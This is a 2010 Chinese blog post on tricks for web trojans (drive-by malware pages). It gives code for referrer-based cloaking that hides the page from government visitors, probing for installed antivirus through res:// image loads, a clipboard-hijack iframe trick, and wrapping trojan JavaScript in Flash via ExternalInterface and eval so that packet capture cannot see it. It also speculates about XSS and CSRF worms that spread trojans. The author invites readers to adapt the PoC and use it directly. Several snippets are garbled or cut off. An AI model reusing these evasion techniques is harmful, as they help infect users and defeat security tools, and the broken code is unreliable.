分类

学习笔记 [17]
渗透测试 [4]
一些杂文 [14]
coding [16]
漏洞信息 [17]
技术文章 [15]
开发文档 [8]
个人作品 [5]
PS:个人作品在各种下载栏目均有下载

站内搜索

日历

«  January 2010  »
Su Mo Tu We Th Fr Sa
     12
3456789
10111213141516
17181920212223
24252627282930
31

友情链接

  • 莫良博客
  • 冷夜博客
  • 八神博客
  • Tm3yShell7
  • 2idy电影网
  • Blueandhack's Blog
  • 幻泉博客
  • 羽蛇
  • Elaf
  • 小冰's Blog

    • 访问统计(起于2010/10/2)

    访问统计
    PortWatcher's Blog
    Monday, 2025-06-30, 2:57 PM
    Welcome Guest
    Main | Registration | Login | RSS

    Blog

    Main » 2010 » January » 30 » 网马猥亵技巧
    11:32 AM
    网马猥亵技巧
    1、前段时间看到的:

    Code

    <script>
    var parent_url= window.parent.location.href.toLowerCase();
    var where = =document.referrer.toLowerCase();
    var self_url = =document.location.href.toLowerCase();
    if (where.index0f("gov")>=0 self_url == parent_url
    where == "")
    {
    }
    location.replace("about;blank");
    }
    </script>

    2、刚刚不小心看到的:

    Code

    function jc()  
    {  
    jc_list = ['res://C:\\Program%20Files\\Rising\\Rav\\rssafety.exe/PNG/123','res://D:\\Program%20Files\\Rising\\Rav\\rssafety.exe/PNG/123','res://E:\\Program%20Files\\Rising\\Rav\\rssafety.exe/PNG/123'];  
    for ( i= 0; i  
    {  
    ischeck = 1;  
    x = new Image();  
    x.onerror = function()  
    {  
    ischeck = 0;  
    }  
    x.src = jc_list[i];  
    if (ischeck == 1)  
    return 1;  
    delete x;  
    }  
    return 0;  
    }  

    第一个、剪贴板劫持挂马
    其实这是针对富文本编辑器的一种隐蔽的攻击方式,当你粘贴某段从别处拷贝来的文字时,就会执行一个iframe标签对象(富文本编辑器的性质),iframe加载网马。简单的demo:

    Code

    <iframe src=http://www.baidu.com/ height=110 width=110></iframe>
    <script>
    var iframe = document.getElementsByTagName("iframe")[0];
    var rng = document.body.createControlRange();
    rng.add(iframe);
    rng.execCommand('Copy');
    </script>

    只在IE6下有效,如何去扩展就看各位了,其实一般这样猥亵的技巧仅供娱乐,真正的运用,我觉得也是不太可能的,除非它变得更加猥亵。

    第二个、img远程域检测本地域软件安装情况
    网马要检测本地安装什么软件?无非就是那些安全软件,卡巴、小红伞、360、365门神(AD:顺便说下,365不是畅游巡警的山寨- -,和360的定位是不一样的)之类。稳定的demo:

    IE6/7/8通杀,我写完这个POC没几天就被告之老外早已经给出POC了,上面这些代码是我们自己探讨出来的,当时对res协议还不太懂,还问了一些朋友。现在我们的这个POC扩展性好,很稳定。大家可以改改直接使用。

    第三个、利用Flash封装网马
    这个更加猥亵,我们使用服务端技术保护网马,保护来保护去,网马的JS代码还是会被抓到,在那些浏览器抓包工具下,网马的JS暴露无遗,原理很简单,网马再怎么通过判断(比如通过Cookie,IP,referer等)来保护自己,为了危害用户,总是要输出JS来给浏览器去执行,那么就会暴露网马JS代码。那就没什么办法保护我们的网马JS代码了?有……
    我们使用Flash来封装网马,这样,使用Flash AS的扩展API:ExternalInterface类,这个类是AS与JS直接通信的最好方式,比如如下AS代码:

    Code

    import flash.external.*;  
    ExternalInterface.call("eval","alert(document.domain);function ajax(){var request = false;if(window.XMLHttpRequest) {request = new XMLHttpRequest();} else if(window.ActiveXObject) {var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0', 'Msxml2.XMLHTTP.6.0', 'Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];for(var i=0; i  

    上面的代码原理是什么呢,ExternalInterface类的call方法可以直接使用Flash容器(这里是HTML页)的JS函数,它有两个参数,第一个是要调用的JS函数名,第二个是被调用的JS函数要执行的参数。我们这里其实是劫持了eval函数,这是JS的内置函数,利用它可以执行任意的JS代码。根据这个原理,我们可以将所有的JS代码封装在Flash文件中。
    G使用这个方法成功封装了06014网马,并对我们的Flash压缩加密保护,使用一般的Flash反编译软件是破解不了的,而且在网马的执行过程中,是无法通过浏览器抓包工具抓到网马的JS代码。这就起到了不错的保护作用:)。

    第四个、Web2.0蠕虫式挂马
    这个要怎么说呢,传统的挂马方式危害很大的有mass sql injection,在短时间内批量注入挂马。我们至今没见到Web2.0蠕虫式的挂马,大家讨论了认为:这是成本问题(但是是不是这样我就不知道了),不是谁都可以轻易写出Web2.0蠕虫。不过大风今天在xKungfoo上说今后会让大家很方便写出XSS蠕虫的,那就是anehta平台将会提供打包一些蠕虫功能。
    Web2.0蠕虫现在有两种表现形式:XSS蠕虫与CSRF蠕虫。在Web2.0蠕虫的传播过程中完全可以挂马。以前放出的一些Web2.0蠕虫都是一个玩笑,没给出危害,但是千万不要认为这永远都是黑客的一个玩笑。我们相信挂马的方式会出现这个的……
    恩,这就是今天G的演讲内容的其中一部分。还有一些猥亵的技巧,也许对我们的Webscan全网监控系统都是一个挑战,不过我相信普通挂马者不会使用某些猥亵技巧,那就仅当娱乐吧。

    Category: coding | Views: 744 | Added by: Jury | Rating: 0.0/0
    Total comments: 0
    Name *:
    Email *:
    Code *:

    admin@portwatcher.net |